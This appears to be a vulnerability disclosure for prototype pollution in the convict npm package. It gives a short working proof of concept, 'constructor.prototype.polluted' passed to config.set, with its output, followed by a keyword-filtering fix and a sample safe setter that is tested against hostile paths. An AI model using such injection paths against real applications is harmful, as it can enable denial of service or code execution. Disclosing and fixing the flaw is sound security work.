Closed
Description
Convict is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
Create the following PoC file:
- index.js

```js
const convict = require("convict"); // 6.2.3
let obj = {};
const config = convict(obj);
console.log({}.polluted); // undefined
config.set("constructor.prototype.polluted", "polluted1");
let a = {};
console.log(a.polluted); // polluted1
```

Run:

```
node index.js
```

Output:

```
undefined
polluted1
```
💻 Technical Description
The fix is implemented by not allowing modification of the object prototype.
Filter out all keywords and check for vulnerable instances like constructor | __proto__ | prototype
Exploit Image
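The key filtering suggested in the issue can be sketched as a dotted-path setter that rejects prototype-reaching segments and only descends into own properties. This is an added example, not convict's code or its actual fix; `FORBIDDEN`, `splitPath`, `safeSet`, `trySet` and `demo` are hypothetical names, and the sample paths are constructed.

```javascript
'use strict';
// Added example (not convict's implementation): all names are hypothetical.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Split a dotted path and reject any segment that can reach a prototype.
function splitPath(path) {
  if (typeof path !== 'string' || path.length === 0) {
    throw new TypeError('path must be a non-empty string');
  }
  const parts = path.split('.');
  for (const part of parts) {
    if (part === '') throw new TypeError(`empty segment in "${path}"`);
    if (FORBIDDEN.has(part)) throw new Error(`refusing segment "${part}" in "${path}"`);
  }
  return parts;
}

// Define a plain data property without going through inherited setters.
function defineOwn(node, key, value) {
  Object.defineProperty(node, key, { value, writable: true, enumerable: true, configurable: true });
}

function safeSet(target, path, value) {
  const parts = splitPath(path);
  let node = target;
  for (const key of parts.slice(0, -1)) {
    // Inherited properties are never followed; missing containers are
    // created with a null prototype so they have no chain to walk.
    if (!hasOwn(node, key)) defineOwn(node, key, Object.create(null));
    if (node[key] === null || typeof node[key] !== 'object') {
      throw new TypeError(`"${key}" in "${path}" is not an object`);
    }
    node = node[key];
  }
  defineOwn(node, parts[parts.length - 1], value);
  return target;
}

function trySet(target, path, value) {
  try { safeSet(target, path, value); return 'set'; } catch (e) { return 'rejected'; }
}

// Constructed inputs: one ordinary key plus the three keywords from the issue.
function demo() {
  const cfg = {};
  const paths = ['db.host', 'constructor.prototype.polluted', '__proto__.polluted', 'a.prototype.b'];
  const results = paths.map((p) => [p, trySet(cfg, p, 'polluted1')]);
  return { cfg, results, leaked: ({}).polluted };
}
```

Rejecting the three names outright also blocks legitimate keys with those names, which is the trade-off the filter in the issue accepts.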
